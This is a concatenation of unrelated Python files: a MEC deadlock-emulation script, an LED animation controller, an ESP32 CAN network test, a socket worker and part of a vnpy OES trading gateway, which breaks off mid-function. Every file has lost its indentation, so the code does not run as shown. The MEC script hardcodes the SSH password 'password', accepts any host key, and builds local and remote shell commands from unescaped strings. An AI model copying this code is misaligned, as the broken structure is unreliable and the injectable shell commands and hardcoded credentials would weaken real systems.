outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results edf+wait-die {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_16_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_16_{mec_no} = {mec_rtt} \ncpu{_id_}_16_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_16_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_16_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_16_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_16_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_16_{mec_no} = {deadlock} \nmemory{_id_}_16_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_16_{mec_no} = {cooperate} \ntask_record{_id_}_16_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_16_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_16_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_16_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_16_{mec_no} = {mec_rtt} \ncpu{_id_}_16_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_16_{mec_no} = {_off_mec} \noff_cloud{_id_}_16_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_16_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_16_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_16_{mec_no} = {deadlock} \nmemory{_id_}_16_{mec_no} = {memory}",
f"\ntask_received{_id_}_16_{mec_no} = {total_received_task} \nsent_t{_id_}_16_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_16_{mec_no} = {cooperate} \ntask_record{_id_}_16_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_16_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_16_{mec_no} = {offload_check}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_16_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_16_{mec_no}datap.py"
os.system(cmd)
else:
os.system(f'mkdir -p {path_}')
cmd = f"echo '' > {path_}{_id_}_16_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_16_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_16_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_16_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_16_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
list_seq = get_exec_seq(edf())
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = False
for th in threads_:
th.join()
time.sleep(1)
print('done')
break
print('algo stopped!')
run = 1
stop = True
time.sleep(20)
for th in threads_:
th.join()
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 30))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--mec_no', type=int, default=1.0, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
animationcontroller.py
|
# led-control WS2812B LED Controller Server
# Copyright 2021 jackw01. Released under the MIT License (see LICENSE for details).
import math
import random
import time
import traceback
import RestrictedPython
from threading import Event, Thread
from ledcontrol.controlclient import ControlClient
import ledcontrol.animationpatterns as animpatterns
import ledcontrol.colorpalettes as colorpalettes
import ledcontrol.driver as driver
import ledcontrol.utils as utils
class RepeatedTimer:
'Repeat function call at a regular interval'
def __init__(self, interval, function, *args, **kwargs):
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.count = 0
self.wait_time = 0
self.last_start = time.perf_counter()
self.last_measurement_c = 0
self.last_measurement_t = 0
self.perf_avg = 0
self.event = Event()
self.thread = Thread(target=self.target, daemon=True)
def start(self):
'Starts the timer thread'
self.thread.start()
def target(self):
'Waits until ready and executes target function'
while not self.event.wait(self.wait_time):
self.last_start = time.perf_counter()
self.function(*self.args, **self.kwargs)
self.perf_avg += (time.perf_counter() - self.last_start)
self.count += 1
if self.count % 100 == 0:
print('Average execution time (s): {}'.format(self.perf_avg / 100))
print('Average speed (cycles/s): {}'.format(self.get_rate()))
self.perf_avg = 0
# Calculate wait for next iteration
self.wait_time = self.interval - (time.perf_counter() - self.last_start)
if (self.wait_time < 0):
self.wait_time = 0
def get_rate(self):
'Returns current rate in cycles per second'
result = ((self.count - self.last_measurement_c) /
(self.last_start - self.last_measurement_t))
self.last_measurement_c = self.count
self.last_measurement_t = self.last_start
return result
def stop(self):
'Stops the timer thread'
self.event.set()
self.thread.join()
class AnimationController:
def __init__(self, led_controller, refresh_rate, led_count,
mapping_func,
led_color_correction):
self.led_controller = led_controller
self.refresh_rate = refresh_rate
self.led_count = led_count
self.mapping_func = mapping_func
# Initialize prev state arrays
self.reset_prev_states()
# Map led indices to normalized position vectors
self.mapped = [self.mapping_func(i) for i in range(self.led_count)]
# Check mapping dimensions to simplify loop if possible
self.mapping_uses_x_only = True
for point in self.mapped:
if point.y != 0:
self.mapping_uses_x_only = False
# Create lists used to cache current mapping
# so it doesn't have to be recalculated every frame
self.primary_mapping = []
self.secondary_mapping = []
# Used to render main slider/select list
self.params = {
'brightness': 0.15,
'color_temp': 6500,
'gamma': 1.0,
'saturation': 1.0,
'primary_pattern': 0,
'primary_speed': 0.2,
'primary_scale': 1.0,
'secondary_pattern': 0,
'secondary_speed': 0.2,
'secondary_scale': 1.0,
'palette': 0,
'direct_control_mode': 0,
}
# Lookup dictionary for pattern functions used to generate select menu
self.pattern_functions = {}
# Initialize primary patterns
for k, v in animpatterns.default.items():
self.set_pattern_function(k, v['source'])
# Lookup dictionary for secondary pattern functions
self.secondary_pattern_functions = animpatterns.default_secondary
# Color palette used for animations
self.palette_table_size = 1000
self.palettes = dict(colorpalettes.default)
self.calculate_palette_table()
# Set default color temp
self.correction_original = led_color_correction
self.calculate_color_correction()
# Set default mapping
self.calculate_mappings()
# Prepare to start
self.start = time.perf_counter()
self.time = 0
self.update_needed = True # Is the LED state going to change this frame?
self.control_client = ControlClient()
def compile_pattern(self, source):
'Compiles source string to a pattern function with restricted globals'
def getitem(obj, index):
if obj is not None and type(obj) in (list, tuple, dict):
return obj[index]
raise Exception()
def getiter(obj):
return obj
restricted_globals = {
'__builtins__': RestrictedPython.Guards.safe_builtins,
'_print_': RestrictedPython.PrintCollector,
'_getattr_': RestrictedPython.Guards.safer_getattr,
'_getitem_': getitem,
'_getiter_': getiter,
'_write_': RestrictedPython.Guards.full_write_guard,
'math': math,
'random': random,
'palette': self.get_palette_color,
'palette_length': self.get_palette_length,
'hsv': animpatterns.ColorMode.hsv,
'rgb': animpatterns.ColorMode.rgb,
'clamp': utils.clamp,
'wave_pulse': driver.wave_pulse,
'wave_triangle': driver.wave_triangle,
'wave_sine': driver.wave_sine,
'wave_cubic': driver.wave_cubic,
'plasma_sines': driver.plasma_sines,
'plasma_sines_octave': driver.plasma_sines_octave,
'perlin_noise_3d': driver.perlin_noise_3d,
'impulse_exp': utils.impulse_exp,
'fract': utils.fract,
'blackbody_to_rgb': driver.blackbody_to_rgb,
'blackbody_correction_rgb': driver.blackbody_correction_rgb,
}
restricted_locals = {}
arg_names = ['t', 'dt', 'x', 'y', 'prev_state']
results = RestrictedPython.compile_restricted_exec(source)
warnings = list(results.warnings)
for name in results.used_names:
if name not in restricted_globals and name not in arg_names:
warnings.append(f'NameError: name \'{name}\' is not defined')
if results.code:
exec(results.code, restricted_globals, restricted_locals)
return results.errors, warnings, restricted_locals['pattern']
else:
return results.errors, warnings, None
def reset_prev_states(self):
'Reset previous animation state lists'
blank = [((0, 0, 0), 0) for i in range(self.led_count)]
self.primary_prev_state = blank[:]
self.secondary_prev_state = blank[:]
def calculate_color_correction(self):
'Calculate and store color temperature correction'
rgb = driver.blackbody_to_rgb(self.params['color_temp'])
c = [self.correction_original[0] * int(rgb[0] * 255) // 255,
self.correction_original[1] * int(rgb[1] * 255) // 255,
self.correction_original[2] * int(rgb[2] * 255) // 255]
self.correction = (c[0] << 16) | (c[1] << 8) | c[2]
def calculate_mappings(self):
'Calculate and store spatial mapping values with current scale'
p = []
s = []
if self.params['primary_scale'] != 0:
for i in range(self.led_count):
# Calculate scale components to determine animation position
# scale component = position / scale (pattern length in units)
# One cycle is a normalized input value's transition from 0 to 1
p.append((
(self.mapped[i][0] / self.params['primary_scale']) % 1,
(self.mapped[i][1] / self.params['primary_scale']) % 1
))
else:
p = [(0, 0) for i in range(self.led_count)]
if self.params['secondary_scale'] != 0:
for i in range(self.led_count):
s.append((
(self.mapped[i][0] / self.params['secondary_scale']) % 1,
(self.mapped[i][1] / self.params['secondary_scale']) % 1
))
else:
s = [(0, 0) for i in range(self.led_count)]
self.primary_mapping = p
self.secondary_mapping = s
def set_param(self, key, value):
'Set an animation parameter'
self.params[key] = value
self.update_needed = True
if key == 'color_temp':
self.calculate_color_correction()
elif key == 'primary_scale' or key == 'secondary_scale':
self.calculate_mappings()
elif key == 'palette':
self.calculate_palette_table()
def set_pattern_function(self, key, source):
'Update the source code and recompile a pattern function'
errors, warnings, pattern = self.compile_pattern(source)
if len(errors) == 0:
self.pattern_functions[key] = pattern
elif key not in self.pattern_functions:
self.pattern_functions[key] = animpatterns.blank
return errors, warnings
def calculate_palette_table(self):
'Set the color palette and recalculate the lookup table'
palette = self.palettes[self.params['palette']]
palette_table = []
sector_size = 1.0 / (len(palette['colors']) - 1)
for i in range(self.palette_table_size):
f = i / self.palette_table_size
sector = math.floor(f / sector_size)
f = f % sector_size / sector_size
c1, c2 = palette['colors'][sector], palette['colors'][sector + 1]
# Allow full spectrum if extremes are 0 and 1 in any order
# otherwise pick shortest path between colors
h1, h2 = c2[0] - c1[0], c2[0] - 1.0 - c1[0]
palette_table.append((
f * (h1 if abs(h1) < abs(h2) or h1 == 1.0 else h2) + c1[0],
f * (c2[1] - c1[1]) + c1[1],
f * (c2[2] - c1[2]) + c1[2],
))
self.palette_table = palette_table
self.palette_length = len(palette['colors'])
def get_palette_color(self, t):
'Get color from current palette corresponding to index between 0 and 1'
return self.palette_table[int(t * self.palette_table_size) % self.palette_table_size]
def get_palette_length(self):
'Get length of current palette color array'
return self.palette_length
def set_palette(self, key, value):
'Update palette'
self.palettes[key] = value
def delete_palette(self, key):
'Delete palette'
del self.palettes[key]
def begin_animation_thread(self):
'Start animating'
self.timer = RepeatedTimer(1.0 / self.refresh_rate, self.update_leds)
self.timer.start()
def update_leds(self):
'Determine time, render frame, and display'
last_t = self.time
self.time = self.timer.last_start - self.start
delta_t = self.time - last_t
if self.update_needed:
# Begin render
pattern_1 = self.pattern_functions[self.params['primary_pattern']]
pattern_2 = self.secondary_pattern_functions[self.params['secondary_pattern']]
# Calculate times
# Reset time every day to prevent strange floating point math issues
time_2 = self.time % 86400
# time component = time (s) * speed (cycle/s)
primary_time = time_2 * self.params['primary_speed']
primary_delta_t = delta_t * self.params['primary_speed']
secondary_time = time_2 * self.params['secondary_speed']
secondary_delta_t = delta_t * self.params['secondary_speed']
mode = animpatterns.ColorMode.hsv
try:
# Determine current pattern mode
c, mode = pattern_1(0, 0.1, 0, 0, (0, 0, 0))
# Run primary pattern to determine initial color
# State is an array of (color, secondary_value) pairs
s_1 = [(pattern_1(primary_time,
primary_delta_t,
self.primary_mapping[i][0],
self.primary_mapping[i][1],
self.primary_prev_state[i][0])[0],
1) for i in range(self.led_count)]
self.primary_prev_state = s_1
# Run secondary pattern to get new brightness and modify color
if pattern_2 is None:
s_2 = s_1
else:
s_2 = [pattern_2(secondary_time,
secondary_delta_t,
self.secondary_mapping[i][0],
self.secondary_mapping[i][1],
self.secondary_prev_state[i],
s_1[i][0]) for i in range(self.led_count)]
self.secondary_prev_state = s_2
# Direct control mode override
if self.params['direct_control_mode']:
s_2 = self.control_client.get_frame(self.led_count)
mode = animpatterns.ColorMode.hsv
except Exception as e:
msg = traceback.format_exception(type(e), e, e.__traceback__)
print(f'Pattern execution: {msg}')
s_2 = [((0, 0, 0), 0) for i in range(self.led_count)]
# Write colors to LEDs
if mode == animpatterns.ColorMode.hsv:
self.led_controller.set_all_pixels_hsv_float(
[(c[0][0] % 1, c[0][1], c[0][2] * c[1]) for c in s_2],
self.correction,
self.params['saturation'],
self.params['brightness'],
self.params['gamma']
)
elif mode == animpatterns.ColorMode.rgb:
self.led_controller.set_all_pixels_rgb_float(
[(c[0][0] * c[1], c[0][1] * c[1], c[0][2] * c[1]) for c in s_2],
self.correction,
self.params['saturation'],
self.params['brightness'],
self.params['gamma']
)
# If displaying a static pattern with no secondary pattern, brightness is 0,
# or speed is 0: no update is needed the next frame
self.update_needed = not (
((self.params['primary_pattern'] in animpatterns.static_patterns or self.params['primary_speed'] == 0) and self.params['secondary_pattern'] == 0) or self.params['brightness'] == 0)
def clear_leds(self):
'Turn all LEDs off'
self.led_controller.set_all_pixels_rgb_float(
[(0, 0, 0) for i in range(self.led_count)],
self.correction,
self.params['saturation'],
self.params['brightness'],
self.params['gamma']
)
def end_animation(self):
'Stop rendering in the animation thread'
self.timer.stop()
|
example_test.py
|
# Need Python 3 string formatting functions
from __future__ import print_function
from threading import Thread
import ttfw_idf
# Define tuple of strings to expect for each DUT.
master_expect = ("CAN Master: Driver installed", "CAN Master: Driver uninstalled")
slave_expect = ("CAN Slave: Driver installed", "CAN Slave: Driver uninstalled")
listen_only_expect = ("CAN Listen Only: Driver installed", "CAN Listen Only: Driver uninstalled")
def dut_thread_callback(**kwargs):
# Parse keyword arguments
dut = kwargs['dut'] # Get DUT from kwargs
expected = kwargs['expected']
result = kwargs['result'] # Get result[out] from kwargs. MUST be of mutable type e.g. list
# Must reset again as flashing during start_app will reset multiple times, causing unexpected results
dut.reset()
for string in expected:
dut.expect(string, 20)
# Mark thread has run to completion without any exceptions
result[0] = True
@ttfw_idf.idf_example_test(env_tag='Example_CAN2')
def test_can_network_example(env, extra_data):
# Get device under test. "dut1", "dut2", and "dut3" must be properly defined in EnvConfig
dut_master = env.get_dut("dut1", "examples/peripherals/can/can_network/can_network_master",
dut_class=ttfw_idf.ESP32DUT)
dut_slave = env.get_dut("dut2", "examples/peripherals/can/can_network/can_network_slave",
dut_class=ttfw_idf.ESP32DUT)
dut_listen_only = env.get_dut("dut3", "examples/peripherals/can/can_network/can_network_listen_only",
dut_class=ttfw_idf.ESP32DUT)
# Flash app onto each DUT, each DUT is reset again at the start of each thread
dut_master.start_app()
dut_slave.start_app()
dut_listen_only.start_app()
# Create dict of keyword arguments for each dut
results = [[False], [False], [False]]
master_kwargs = {"dut": dut_master, "result": results[0], "expected": master_expect}
slave_kwargs = {"dut": dut_slave, "result": results[1], "expected": slave_expect}
listen_only_kwargs = {"dut": dut_listen_only, "result": results[2], "expected": listen_only_expect}
# Create thread for each dut
dut_master_thread = Thread(target=dut_thread_callback, name="Master Thread", kwargs=master_kwargs)
dut_slave_thread = Thread(target=dut_thread_callback, name="Slave Thread", kwargs=slave_kwargs)
dut_listen_only_thread = Thread(target=dut_thread_callback, name="Listen Only Thread", kwargs=listen_only_kwargs)
# Start each thread
dut_listen_only_thread.start()
dut_master_thread.start()
dut_slave_thread.start()
# Wait for threads to complete
dut_listen_only_thread.join()
dut_master_thread.join()
dut_slave_thread.join()
# check each thread ran to completion
for result in results:
if result[0] is not True:
raise Exception("One or more threads did not run successfully")
if __name__ == '__main__':
test_can_network_example()
|
worker.py
|
import json
import socket
import time
import sys
import random
import numpy as np
import threading
from datetime import datetime
port_no=int(sys.argv[1])
worker_id=sys.argv[2]
class worker:
def __init__(self):
self.req()
''' Function which decrements the duration of the task until 0 i.e executes the task and sends a update message to the master at port 5001'''
def run1(self,task):
duration=task[2]
while(duration):
duration-=1
time.sleep(1)
res=socket.socket()
res.connect(("localhost",5001))
s=','.join(str(i) for i in task)
print("sending message task completed",task[1])
with open("logs_worker_"+str(task[5])+'_'+str(task[7])+".txt",'a') as f:
f.write(str(task[0])+","+str(task[1])+",task_end,"+str(datetime.now())+"\n")
res.send(s.encode())
''' Function to recieve the task execution message from the master at port specified as the command line argument, and spawns a thread with the function run1 to execute the task'''
def req(self):
req=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
req.bind(("localhost",port_no))
req.listen(12)
while(True):
conn2, addr2 = req.accept()
task=conn2.recv(1024).decode()
task=task.split(',')
task[2]=int(task[2])
task[4]=int(task[4])
task[5]=int(task[5])
task[6]=int(task[6])
print("Got the request to execute task",task[1])
with open("logs_worker_"+str(task[5])+'_'+str(task[7])+".txt",'a') as f:
f.write(str(task[0])+","+str(task[1])+",task_start,"+str(datetime.now())+"\n")
thread='thread'+str(task[6])
thread=threading.Thread(target=self.run1,args=[task])
thread.start()
st=worker()
|
oes_td.py
|
import time
from copy import copy
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from gettext import gettext as _
from threading import Lock, Thread
# noinspection PyUnresolvedReferences
from typing import Any, Callable, Dict
from vnpy.api.oes.vnoes import OesApiClientEnvT, OesApiSubscribeInfoT, OesApi_DestoryAll, \
OesApi_InitLogger, OesApi_InitOrdChannel2, OesApi_InitQryChannel2, OesApi_InitRptChannel2, \
OesApi_LogoutAll, OesApi_QueryCashAsset, \
OesApi_QueryOptHolding, OesApi_QueryOption, OesApi_QueryOrder, OesApi_QueryStkHolding, \
OesApi_QueryStock, OesApi_SendOrderCancelReq, OesApi_SendOrderReq, OesApi_SetCustomizedDriverId, \
OesApi_SetThreadPassword, OesApi_SetThreadUsername, OesApi_WaitReportMsg, OesOrdCancelReqT, \
OesOrdCnfmT, OesOrdRejectT, OesOrdReqT, OesQryCashAssetFilterT, OesQryCursorT, \
OesQryOptionFilterT, OesQryOrdFilterT, OesQryStkHoldingFilterT, OesQryStockFilterT, \
OesRspMsgBodyT, OesStockBaseInfoT, OesTrdCnfmT, SGeneralClientChannelT, SMSG_PROTO_BINARY, \
SMsgHeadT, cast, eOesBuySellTypeT, eOesMarketIdT, eOesMsgTypeT, \
eOesOrdStatusT, eOesOrdTypeShT, eOesOrdTypeSzT, eOesSubscribeReportTypeT
from vnpy.gateway.oes.error_code import error_to_str
from vnpy.gateway.oes.utils import create_remote_config, is_disconnected
from vnpy.trader.constant import Direction, Exchange, Offset, OrderType, Product, Status
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import AccountData, CancelRequest, ContractData, OrderData, OrderRequest, \
PositionData, TradeData
EXCHANGE_OES2VT = {
eOesMarketIdT.OES_MKT_SH_ASHARE: Exchange.SSE,
eOesMarketIdT.OES_MKT_SZ_ASHARE: Exchange.SZSE,
eOesMarketIdT.OES_MKT_SH_OPTION: Exchange.SHFE,
}
EXCHANGE_VT2OES = {v: k for k, v in EXCHANGE_OES2VT.items()}
PRODUCT_OES2VT = {
eOesMarketIdT.OES_MKT_SH_ASHARE: Product.EQUITY,
eOesMarketIdT.OES_MKT_SZ_ASHARE: Product.EQUITY,
eOesMarketIdT.OES_MKT_SH_OPTION: Product.FUTURES,
}
# only limit price can match, all other price types are not perfectly match.
ORDER_TYPE_VT2OES = {
(Exchange.SSE, OrderType.LIMIT): eOesOrdTypeShT.OES_ORD_TYPE_SH_LMT,
(Exchange.SZSE, OrderType.LIMIT): eOesOrdTypeSzT.OES_ORD_TYPE_SZ_LMT,
}
ORDER_TYPE_OES2VT = {
(eOesMarketIdT.OES_MKT_SH_ASHARE, eOesOrdTypeShT.OES_ORD_TYPE_SH_LMT): OrderType.LIMIT,
(eOesMarketIdT.OES_MKT_SZ_ASHARE, eOesOrdTypeSzT.OES_ORD_TYPE_SZ_LMT): OrderType.LIMIT,
}
BUY_SELL_TYPE_VT2OES = {
(Exchange.SSE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SSE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SSE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SHFE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY_OPEN,
(Exchange.SHFE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL_OPEN,
(Exchange.SHFE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY_OPEN,
(Exchange.SHFE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY_CLOSE,
(Exchange.SHFE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL_CLOSE,
(Exchange.SHFE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY_CLOSE,
}
STATUS_OES2VT = {
eOesOrdStatusT.OES_ORD_STATUS_NEW: Status.NOTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_DECLARED: Status.NOTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_PARTIALLY_FILLED: Status.PARTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_FILLED: Status.ALLTRADED,
eOesOrdStatusT.OES_ORD_STATUS_CANCEL_DONE: Status.CANCELLED,
eOesOrdStatusT.OES_ORD_STATUS_PARTIALLY_CANCELED: Status.CANCELLED,
eOesOrdStatusT.OES_ORD_STATUS_CANCELED: Status.CANCELLED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_OES: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_F: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_E: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_COMM: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_F: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_E: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_REJECT: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_TRY_AGAIN: Status.REJECTED,
}
bjtz = timezone(timedelta(hours=8))
@dataclass
class InternalOrder:
order_id: int = None
vt_order: OrderData = None
def parse_oes_datetime(date: int, time: int):
"""convert oes datetime to python datetime"""
# YYYYMMDD
year = int(date / 10000)
month = int((date % 10000) / 100)
day = int(date % 100)
# HHMMSSsss
hour = int(time / 10000000)
minute = int((time % 10000000) / 100000)
sec = int((time % 100000) / 1000)
mill = int(time % 1000)
return datetime(year, month, day, hour, minute, sec, mill * 1000, tzinfo=bjtz)
class OesTdMessageLoop:
def __init__(self,
gateway: BaseGateway,
env: OesApiClientEnvT,
td: "OesTdApi",
order_manager: "OrderManager",
):
""""""
self.gateway = gateway
self._env = env
self._td = td
self._order_manager = order_manager
self._alive = False
self._th = Thread(target=self._message_loop)
self.message_handlers: Dict[eOesMsgTypeT, Callable[[OesRspMsgBodyT], int]] = {
eOesMsgTypeT.OESMSG_RPT_BUSINESS_REJECT: self.on_order_rejected,
eOesMsgTypeT.OESMSG_RPT_ORDER_INSERT: self.on_order_inserted,
eOesMsgTypeT.OESMSG_RPT_ORDER_REPORT: self.on_order_report,
eOesMsgTypeT.OESMSG_RPT_TRADE_REPORT: self.on_trade_report,
eOesMsgTypeT.OESMSG_RPT_STOCK_HOLDING_VARIATION: self.on_stock_holding,
eOesMsgTypeT.OESMSG_RPT_OPTION_HOLDING_VARIATION: self.on_option_holding,
eOesMsgTypeT.OESMSG_RPT_CASH_ASSET_VARIATION: self.on_cash,
eOesMsgTypeT.OESMSG_RPT_REPORT_SYNCHRONIZATION: lambda x: 1,
eOesMsgTypeT.OESMSG_SESS_HEARTBEAT: lambda x: 1,
}
def start(self):
""""""
if not self._alive: # not thread-safe
self._alive = True
self._th.start()
def stop(self):
""""""
self._alive = False
def join(self):
""""""
self._th.join()
def reconnect(self):
""""""
self.gateway.write_log(_("正在尝试重新连接到交易服务器。"))
self._td.connect_rpt_channel()
def _on_message(self, session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any):
""""""
if session_info.protocolType == SMSG_PROTO_BINARY:
b = cast.toOesRspMsgBodyT(body)
if head.msgId in self.message_handlers:
self.message_handlers[head.msgId](b)
else:
self.gateway.write_log(
f"unknown msg id : {head.msgId} {eOesMsgTypeT(head.msgId)}")
else:
self.gateway.write_log(f"unknown prototype : {session_info.protocolType}")
return 1
def _message_loop(self):
""""""
rpt_channel = self._env.rptChannel
timeout_ms = 1000
while self._alive:
ret = OesApi_WaitReportMsg(rpt_channel,
timeout_ms,
self._on_message)
if ret < 0:
# if is_timeout(ret):
# pass # just no message
if is_disconnected(ret):
